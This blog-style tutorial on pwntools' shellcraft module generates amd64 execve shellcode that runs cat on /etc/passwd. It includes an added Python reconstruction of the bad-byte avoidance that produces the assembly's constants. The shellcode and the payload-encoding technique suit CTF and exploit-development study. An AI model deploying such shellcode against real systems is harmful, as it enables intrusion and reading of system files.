Most of the time while I'm dealing with binary exploitation I need shellcode generated on the fly, so I don't waste time and creativity. I prefer using pwntools for this kind of task, especially its shellcraft module, which lets us generate assembly code from Python for the system calls we select.

What is pwntools?

pwntools is a CTF framework and exploit development library written in Python, designed to be simple, fast and effective.

Shellcraft has tons of system calls that we can use to generate shellcode for our needs, but what we need most of the time is a simple execve or sh spawner.

>>> from pwn import *
>>> dir(shellcraft)
***REDACTED*** 'execve', 'exit', 'setuid', 'setuid32', 'setxattr', 'sgetmask', 'sh', 'shmat', 'shmctl', 'shmdt', 'shmget', 'shutdown', 'sigaction', 'sigaltstack', 'signal', 'signalfd', ***REDACTED*** 'wait4', 'waitid', 'waitpid', 'write', 'writev', 'xor']
>>> context.clear(arch='amd64')  # select the target architecture, in my case amd64 (64-bit)

Most of the time I use the execve system call; here it runs cat to read the /etc/passwd file:

>>> sc = shellcraft.execve(path="/bin/cat", argv=["/bin/cat", "/etc/passwd"])

Use the correct path to the binary we want execve to run.

To see what the generated shellcode looks like as assembly:

>>> print(shellcraft.execve(path="/bin/cat", argv=["/bin/cat", "/etc/passwd"]))

/* execve(path='/bin/cat', argv=['/bin/cat', '/etc/passwd'], envp=0) */
/* push '/bin/cat\x00' */
push 1
dec byte ptr [rsp]
mov rax, 0x7461632f6e69622f
push rax
mov rdi, rsp
/* push argument array ['/bin/cat\x00', '/etc/passwd\x00'] */
/* push '/bin/cat\x00/etc/passwd\x00' */
push 0x64777373
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x61702f6374652f00
xor [rsp], rax
mov rax, 0x7461632f6e69622f
push rax
xor esi, esi /* 0 */
push rsi /* null terminate */
push 0x11
pop rsi
add rsi, rsp
push rsi /* '/etc/passwd\x00' */
push 0x10
pop rsi
add rsi, rsp
push rsi /* '/bin/cat\x00' */
mov rsi, rsp
xor edx, edx /* 0 */
/* call execve() */
push SYS_execve /* 0x3b */
pop rax
syscall
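Every number in that listing comes from one rule: the emitted bytes must not contain a NUL (which would end the string when it is copied as a C string) or a newline. The `push 1 / dec byte ptr [rsp]` pair, the `mov rax, mask / xor [rsp], rax` pair and the `push 0x11 / pop rsi / add rsi, rsp` triples are that bad-byte avoidance at work. The Python below is an added example, not code from the original post and not pwntools' own templates: a simplified reconstruction of the strategy that regenerates the listing's constants from the inputs, so you can check where each value comes from. It assumes the same two bad bytes pwntools' amd64 pushstr avoids, uses a repeated-byte xor mask, and only handles argv offsets that fit in a single byte; pwntools' real templates cover more cases.

```python
import struct

# Bytes that must not appear in the final shellcode (assumed to match pwntools'
# amd64 pushstr: NUL ends C strings, newline ends line-based input).
BAD = b"\x00\n"


def pretty(n):
    """Mimic the listing's number style: small values in decimal, the rest in hex."""
    return str(n) if 0 <= n < 10 else f"{n:#x}"


def _ok(bs):
    """True if no byte of bs is a bad byte."""
    return not any(b in BAD for b in bs)


def _words(data):
    """Split data into 8-byte words, NUL-padding the last one."""
    data += b"\x00" * ((-len(data)) % 8)
    return [data[i:i + 8] for i in range(0, len(data), 8)]


def _xor_pair(word):
    """Find a, b with a ^ b == word such that neither contains a bad byte.
    Repeated-byte masks are tried first, which is why the listing shows 0x0101..."""
    w = int.from_bytes(word, "little")
    for k in range(1, 256):
        if k in BAD:
            continue
        a = int.from_bytes(bytes([k]) * 8, "little")
        if _ok(a.to_bytes(8, "little")) and _ok((a ^ w).to_bytes(8, "little")):
            return a, a ^ w
    raise ValueError("no bad-byte-free xor pair for %r" % word)


def pushstr(s, append_null=True):
    """amd64 instructions that push s onto the stack without bad bytes (reconstruction)."""
    data = s.encode() if isinstance(s, str) else s
    if append_null:
        data += b"\x00"
    asm = [f"/* push {data.decode()!r} */"]
    for word in reversed(_words(data)):          # highest address is pushed first
        signed = struct.unpack("<q", word)[0]
        unsigned = int.from_bytes(word, "little")
        if signed in (0, 0x0a):                   # all-zero word: push n+1, then fix the low byte
            asm += [f"push {pretty(signed + 1)}", "dec byte ptr [rsp]"]
        elif -0x80 <= signed <= 0x7f and _ok(word[:1]):                # push imm8 sign-extends
            asm.append(f"push {pretty(signed)}")
        elif -0x80000000 <= signed <= 0x7fffffff and _ok(word[:4]):    # push imm32 sign-extends
            asm.append(f"push {pretty(signed)}")
        elif _ok(word):                           # full 64-bit immediate needs mov + push
            asm += [f"mov rax, {pretty(unsigned)}", "push rax"]
        else:                                     # word contains a bad byte: push a mask, xor it in
            a, b = _xor_pair(word)
            asm += [f"mov rax, {pretty(a)}", "push rax",
                    f"mov rax, {pretty(a)} ^ {pretty(unsigned)}",  # assembler folds this to b
                    "xor [rsp], rax"]
    return asm


def push_argv(argv):
    """Build the NULL-terminated argv[] pointer array the way the listing does."""
    terminated = [a + "\x00" for a in argv]
    asm = [f"/* push argument array {terminated!r} */"]
    asm += pushstr("\x00".join(argv))             # one block: "arg0\0arg1\0...\0"
    asm += ["xor esi, esi /* 0 */", "push rsi /* null terminate */"]
    # The string block now starts at rsp+8; each pointer pushed below moves it 8 further.
    starts, pos = [], 0
    for a in argv:
        starts.append(pos)
        pos += len(a) + 1
    for i in reversed(range(len(argv))):
        off = 8 + starts[i] + 8 * (len(argv) - 1 - i)
        if off > 0x7f or off in BAD:
            raise ValueError("offset %#x needs another bad-byte-free encoding" % off)
        # push imm8 / pop is a NUL-free "mov rsi, off"; add turns it into an absolute pointer
        asm += [f"push {pretty(off)}", "pop rsi", "add rsi, rsp",
                f"push rsi /* {terminated[i]!r} */"]
    asm.append("mov rsi, rsp")
    return asm


def execve_asm(path, argv):
    """Full listing: path in rdi, argv in rsi, envp=0 in rdx, then the syscall."""
    asm = [f"/* execve(path={path!r}, argv={argv!r}, envp=0) */"]
    asm += pushstr(path) + ["mov rdi, rsp"]
    asm += push_argv(argv)
    asm += ["xor edx, edx /* 0 */", "/* call execve() */",
            "push SYS_execve /* 0x3b */", "pop rax", "syscall"]
    return asm


if __name__ == "__main__":
    print("\n".join(execve_asm("/bin/cat", ["/bin/cat", "/etc/passwd"])))
```

Running it reproduces the listing above: `0x64777373` is "sswd" as a sign-extendable 32-bit push, `0x61702f6374652f00` is the word "\x00/etc/pa" that cannot be pushed directly because of its NUL, and `0x11` / `0x10` are the stack offsets of the two strings at the moment each pointer is computed. Changing the arguments shows how the encoding adapts, and the `ValueError` paths mark the cases this simplified version does not handle.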

To test it out on the go I use the built-in function run_assembly